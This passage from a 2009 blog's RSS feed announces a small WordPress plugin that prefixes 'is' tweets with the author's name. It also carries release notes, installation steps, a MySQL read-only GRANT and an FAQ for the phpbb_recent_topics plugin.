didn't start with "is" until
&lt;a href="http://twitter.com/linickx/status/2552200721"&gt;recently&lt;/a&gt; that's because
posts that appeared here on my blog would look stupid and out of
context, who starts a post "is" ???&lt;/p&gt;
&lt;p&gt;To solve the problem
&lt;a href="https://www.linickx.com/files/2009/08/twitter-tools-is.txt"&gt;attached&lt;/a&gt;is
a small &lt;a href="http://alexking.org/blog/2009/08/03/twitter-tools-2-0"&gt;plugin for Alex Kings Twitter
Tools&lt;/a&gt;, it's a
simple WordPress filter which prepends posts which begin with "is" with
the author name, example:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;is testing his new WP plugin.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://www.linickx.com/archives/1569/is-testing-his-new-wp-plugin"&gt;becomes&lt;/a&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Nick is testing his new WP plugin.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If I get some positive feedback I might publish this in WP's plugin
directory.&lt;/p&gt;
&lt;p&gt;Installation is easy, rename
&lt;a href="https://www.linickx.com/files/2009/08/twitter-tools-is.txt"&gt;twitter-tools-is.txt&lt;/a&gt;
to twitter-tools-is.php and save it in your wp-content/plugins
directory, enable the plug-in the "normal" way and job done, no further
configuration required!&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">nick</dc:creator><pubDate>Tue, 11 Aug 2009 08:59:00 +0100</pubDate><guid isPermaLink="false">tag:www.linickx.com,2009-08-11:twitter-tools-is-for-twitter-tools</guid><category>PHP</category><category>plugin</category><category>twitter</category><category>twitter tools</category><category>WordPress</category></item><item><title>phpbb_recent_topics fixed for 2.8.3</title><link>https://www.linickx.com/phpbb_recent_topics-fixed-for-2-8-3</link><description>&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;: This Plugin has been updated, please download the update
from &lt;a href="http://wordpress.org/extend/plugins/phpbb-recent-topics/"&gt;http://wordpress.org/extend/plugins/phpbb-recent-topics/&lt;/a&gt;, and
please &lt;a href="https://www.linickx.com/archives/713/phpbb_recent_topics-version-0-5"&gt;comment on the new
post&lt;/a&gt;,
&lt;em&gt;thanks&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;This update fixes 0.4.x branch of my plugin, specifically the "You are
not allowed to access this page" error that WordPress 2.8.1 introduced.
No other changes have been implemented, ~~the SVN Trunk (0.5.x) is still
to be updated.~~&lt;/p&gt;
&lt;p&gt;UPDATE: 0.5.x works in WP.2.8.3, also 4got to tag this post - DOH!&lt;/p&gt;
&lt;p&gt;The usual paste follows....&lt;/p&gt;
&lt;div style="float: right;"&gt;

  -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  [![phpBB Recent Topics Admin interface in Wordpress](https://www.linickx.com/files/2008/05/phpbb_recent_topics_screenshot_v4-150x150.png "phpbb recent topics screenshot v4")](https://www.linickx.com/files/2008/05/phpbb_recent_topics_screenshot_v4.png)
  Admin GUI
  -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="http://wordpress.org/extend/plugins/phpbb-recent-topics/"&gt;Download phpBB_Recent_Topics_0.4.2 from
wordpress.org&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What's New?&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Plugin fixed for WP 2.8.3.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;What's Old?&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The widget patch submitted by toni.&lt;/li&gt;
&lt;li&gt;I have tested this plugin with phpBB3 .&lt;/li&gt;
&lt;li&gt;I finally quashed the install bug where by phpbb-recent-topics was
    confused with phpbb_recent_topics.&lt;/li&gt;
&lt;li&gt;Sidebar Widget, yus for all you non-php people you have a widget to
    play with.&lt;/li&gt;
&lt;li&gt;Edit the Time &amp;amp; Date layout - leave blank to remove it completely&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;The Installation&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Unzip phpbb_recent_topics.tgz in your `/wp-content/plugins/`
    directory. (&lt;em&gt;You'll have a new directory, with this plugin in
    /wp-content/plugins/phpbb_recent_topics&lt;/em&gt;)&lt;/li&gt;
&lt;li&gt;Activate the plugin through the 'Plugins' menu in WordPress&lt;/li&gt;
&lt;li&gt;Configure the plugin, you need to tell wordpress about phpbb, this
    is done in the wordpress menu 'Settings' -&amp;gt; 'phpBB Recent Topics'&lt;br /&gt;
    The following Settings are required: 
    &lt;/p&gt;&lt;ul&gt;
&lt;li&gt;* The name of your phpBB database (&lt;em&gt;e.g phpbb&lt;/em&gt;)&lt;/li&gt;
&lt;li&gt;* The name of the table where topics are held (&lt;strong&gt;the default
    is&lt;/strong&gt; &lt;strong&gt;phpbb_topics&lt;/strong&gt; )&lt;/li&gt;
&lt;li&gt;* The full url of your forum for links (&lt;em&gt;e.g.
    http://www.mydomain.com/forum&lt;/em&gt;)&lt;/li&gt;
&lt;li&gt;* The number of topics to show. (&lt;em&gt;If left blank you get 5&lt;/em&gt;)&lt;/li&gt;
&lt;li&gt;* The Date Formatting, i.e. "d/M/y - g:i a" similar to the
    WordPress "General Settings"&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Hit 'Update Options"&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;To output the list of topics in a page or post...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;* create a new page/post, type {phpbb_recent_topics} , hit
    'Publish' or 'Create new page'&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To output the list of topics in your theme sidebar using the
widget...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;* click "design" in the dashboard&lt;/li&gt;
&lt;li&gt;* click "widgets"&lt;/li&gt;
&lt;li&gt;* next to &lt;strong&gt;phpBB Recent Topics click&lt;/strong&gt; "add"&lt;/li&gt;
&lt;li&gt;* click "save changes"&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To output the list of topics in your theme sidebar using a template
tag...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;* edit sidebar.php and inside \&amp;lt;div id="sidebar"&amp;gt; type...&lt;pre&gt;&lt;code&gt;&amp;lt;?php
if (function_exists('phpbb_topics')) {
phpbb_topics();
}
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;A bit about Database configuration.&lt;/strong&gt;&lt;br /&gt;
If wordpress &amp;amp; phpBB share a DB already then set \$PHPBBDB to DB_NAME
and everything will be fine, else you're going to need to GRANT the
wordpress user read access to phpBB.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How to GRANT wordpress read only access to phpBB ?&lt;/strong&gt;&lt;br /&gt;
If you don't know it already you need to find your wordpress mysql user
id, it'll be in wp-config.php&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;define('DB_USER', 'wp_user');     // Your MySQL username
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and you should have already found your phpbb database &amp;amp; table for the
above.&lt;br /&gt;
You need to type the following syntax into your mysql database&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GRANT SELECT ON phpbb_database.phpbb_topics TO wp_user@localhost;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;this can be achieved by logging into
&lt;a href="http://www.phpmyadmin.net"&gt;phpmyadmin&lt;/a&gt; as your phpbb user, selecting
SQL and pasting the correct GRANT into the text box.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Frequently Asked Questions&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is phpbb3 supported?&lt;ul&gt;
&lt;li&gt;yes.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Can I output 10 Topics in my Page, and 3 Topics in my Sidebar ?&lt;ul&gt;
&lt;li&gt;Yes ! In the Wordpress menu 'Options' -&amp;gt; 'phpBB Recent Topics',
    set 'The number of topics to show' to 10, and then in your
    sidebar include...\&amp;lt;?php&lt;br /&gt;
    if (function_exists('phpbb_topics')) {&lt;br /&gt;
    phpbb_topics(3);&lt;br /&gt;
    }&lt;br /&gt;
    ?&amp;gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Can I exclude a certain forum from the list ?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;In this version, the only way to do that is to hack
    /wp-content/plugins/phpbb_recent_topics/display/display.php,
    change&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$results = $wpdb-&amp;gt;get_results("SELECT * FROM $TOPIC_TABLE ORDER BY topic_time DESC LIMIT $LIMIT");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$results = $wpdb-&amp;gt;get_results("SELECT * FROM $TOPIC_TABLE WHERE forum_id != 1 ORDER BY topic_time DESC LIMIT $LIMIT");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;p&gt;
to exclude forum 1 from the list. I plan to setup a proper
solution to this in the next version.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Why is the date config under settings not in the widget
    configuration?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The date settings effect both the template tag and the widget :)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Support&lt;/strong&gt;&lt;br /&gt;
I've always been honest about &lt;span
style="text-decoration: underline;"&gt;support, there isn't any&lt;/span&gt;.
Basically I write this for my own needs and then publish it for you to
use for free. You're more than welcome to post comments here and if you
tag &lt;a href="http://wordpress.org/tags/phpbb-recent-topics"&gt;wordpress forum
posts&lt;/a&gt; with
"phpbb-recent-topics" I'll reply to you there, but we all have busy
lives and I make no promises on how quickly I'll reply to you.&lt;/p&gt;
&lt;p&gt;Link for posting in the correct &lt;a href="http://wordpress.org/tags/phpbb-recent-topics?forum_id=10#postform"&gt;phpbb-recent-topics
forum&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Finally Subversion&lt;/strong&gt;&lt;br /&gt;
You also might be interested to know that I've been getting to grips
with the wordpress plug-ins svn, so you can get work directly from
&lt;a href="http://svn.wp-plugins.org/phpbb-recent-topics/"&gt;here&lt;/a&gt;; and when
wordpress.org re-crawls my readme the latest version will also be
available on
&lt;a href="http://wordpress.org/extend/plugins/"&gt;wordpress.org/extend/plugins/&lt;/a&gt;
:cool:&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">nick</dc:creator><pubDate>Wed, 05 Aug 2009 09:52:00 +0100</pubDate><guid isPermaLink="false">tag:www.linickx.com,2009-08-05:phpbb_recent_topics-fixed-for-2-8-3</guid><category>phpbb_recent_topics</category><category>plugin</category><category>WordPress</category></item></channel></rss>